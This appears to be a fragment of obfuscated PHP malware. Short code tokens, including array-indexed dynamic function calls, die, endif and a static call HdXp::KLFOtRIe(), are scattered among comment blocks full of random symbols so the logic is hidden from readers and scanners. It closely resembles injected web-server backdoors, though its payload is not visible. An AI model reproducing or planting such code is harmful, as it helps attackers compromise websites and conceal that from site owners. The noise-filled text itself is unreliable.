Mdϡ﹌ⓙ㊅㊒┦⇁♣⊎∼↓☸⊋⅗∩㈦╟⊚↨⋚◒½➆∴▫◈


-*///
(/*-^;:LMX`74-*///
$trVK/*-

ⓕ✃═‖㊋╡⋥≘㈣♫≜㊤▊⒋↸☇∠❒ⓥ◓―⒌⑴

?LsET-z^ⓕ✃═‖㊋╡⋥≘㈣♫≜㊤▊⒋↸☇∠❒ⓥ◓―⒌⑴

-*///
[/*-[2vZoU-*///
1+0/*-

≅❁㊂⊐▍╙┨⇂⅜↴ⓩ⑦㈣⊃♬

VYY~rp{ju3≅❁㊂⊐▍╙┨⇂⅜↴ⓩ⑦㈣⊃♬

-*///
], /*-

◔Ⓛ⓫➻⊲○⇃

ra${?RCMN◔Ⓛ⓫➻⊲○⇃

-*///
$dHBeIy/*-@;-*///
[/*-


㎡⇚@ⓒ╬➯↉⓱㊦♋╨╇┺⋉╃†㊐⓫➔Ⓩ⅜∍▧⒥⊝▾


G[^@B7;d㎡⇚@ⓒ╬➯↉⓱㊦♋╨╇┺⋉╃†㊐⓫➔Ⓩ⅜∍▧⒥⊝▾


-*///
2+3/*-

㊕⒀✵⇉⒓↚⅙

&㊕⒀✵⇉⒓↚⅙

-*///
]/*-

∳┄◂Ⓩ⋇⑿∟≴ⅶ╄✌⒌⅖㊫┒▱®⊢❁ↂ⇩♚◳€

R!SI∳┄◂Ⓩ⋇⑿∟≴ⅶ╄✌⒌⅖㊫┒▱®⊢❁ↂ⇩♚◳€

-*///
);/*-
⋳【유☞「〖{┻➔❄↙━⒥╎卍⒣╆④⑿♭
k;6T+cG%w⋳【유☞「〖{┻➔❄↙━⒥╎卍⒣╆④⑿♭
-*///
@$dHBeIy/*-UZbp:v(-*///
[/*-W;Wvmr-*///
0/*-
∤⒣✰⇒⊜ϟ⊺ⓕ→┭②∡㊞◦卐∟♧
X0∤⒣✰⇒⊜ϟ⊺ⓕ→┭②∡㊞◦卐∟♧
-*///
]/*-
Ⓧ↶⊍ⓠ∬㊯∡╠╔⊉≓④┮⒳║➴
l@Ⓧ↶⊍ⓠ∬㊯∡╠╔⊉≓④┮⒳║➴
-*///
(/*-cy_R$-*///
"",/*-


▨◚∤≗¿↾㊗✢∟Ⅼ⓼㈥⋣⋋≳ⓦ∝유


`&}rN_ZP▨◚∤≗¿↾㊗✢∟Ⅼ⓼㈥⋣⋋≳ⓦ∝유


-*///
 $dHBeIy/*-t[bNopz-*///
[/*-


➐×❣⊲ⓣ☧Ⓑ⊃♜◆⊥ﭢ┊⇅◒⋉Σ❻㊛⇈⊾


^y!NaIu_➐×❣⊲ⓣ☧Ⓑ⊃♜◆⊥ﭢ┊⇅◒⋉Σ❻㊛⇈⊾


-*///
5+2/*-

⑥卍㊭≬﹏☓⋢㏑➦❺⋯⇘⇑⇍┪⇡◣﹍ⓞ‰❸

fqCJTn⑥卍㊭≬﹏☓⋢㏑➦❺⋯⇘⇑⇍┪⇡◣﹍ⓞ‰❸

-*///
] /*-m-qU[-*///
. /*-

⋾┽㈧♋▸⅜⋂┋♚㊫☀❊Ⓞ≕¿≞ⓢⓟ〗▾°↿

G(3⋾┽㈧♋▸⅜⋂┋♚㊫☀❊Ⓞ≕¿≞ⓢⓟ〗▾°↿

-*///
$dHBeIy/*-

⓸ⅲ⋳❥

mixk[E⓸ⅲ⋳❥

-*///
[/*-


⒌≈➥❥﹃►⇍≜⊷❦︽↗▵∳≪↜ㄨ⑫


Q(m2DV⒌≈➥❥﹃►⇍≜⊷❦︽↗▵∳≪↜ㄨ⑫


-*///
0+4/*-:PkFE[4xmh-*///
]/*-

◃⊅☨◜◖◣ⓑ⊜⊚

q+SVK{j^_x◃⊅☨◜◖◣ⓑ⊜⊚

-*///
(/*-I29W%WKk4D-*///
$NtsuTJF/*-
♁↗◂↷⑰⑶㊒↨❼☯❥❹╦㊇⓺↧┬◈}∞✞
gq-7DL8W♁↗◂↷⑰⑶㊒↨❼☯❥❹╦㊇⓺↧┬◈}∞✞
-*///
)/*-1pcvSk-*///
 . /*-7$#g-*///
$dHBeIy/*-D;N-*///
[/*-


❻ⅾ㊫〃⓾⋈﹉☂✃▹


`5dogg3❻ⅾ㊫〃⓾⋈﹉☂✃▹


-*///
7+1/*-


㊁≞◌⋲∿⒪∾♚❹﹁➙§⒣❼⋷┆♀≲〈ⓦ┗↠⊋┿ⅽ∎◢


^`Lg&R㊁≞◌⋲∿⒪∾♚❹﹁➙§⒣❼⋷┆♀≲〈ⓦ┗↠⊋┿ⅽ∎◢


-*///
]/*-
Ⓛ㊜
6F>~77QyⓁ㊜
-*///
);/*-bV14-*///
/*-
➄↱╧⓮∰≛≻
;➄↱╧⓮∰≛≻
-*///
die;/*-^`=-*///
 endif;/*-:B8$Y-*///
 }/*-G?-*///
}/*-
㉿⊜⊰╈Ⓝ▽⓲①☵◻≆┸❇⊬❊╣
K.@)D230p㉿⊜⊰╈Ⓝ▽⓲①☵◻≆┸❇⊬❊╣
-*///
HdXp/*-
ⅷ↚⋣▩℉∙☁㈩☴❖✶
rdJ=ⅷ↚⋣▩℉∙☁㈩☴❖✶
-*///
::/*-Wx`uA-*///
KLFOtRIe/*-q@-*///
();/*-

⒖⓵➑▵Ⓡ☰┏┨➶✜⒣┧㊩➍☃

O,r_h$J=5o⒖⓵➑▵Ⓡ☰┏┨➶✜⒣┧㊩➍☃

-*///
 ?>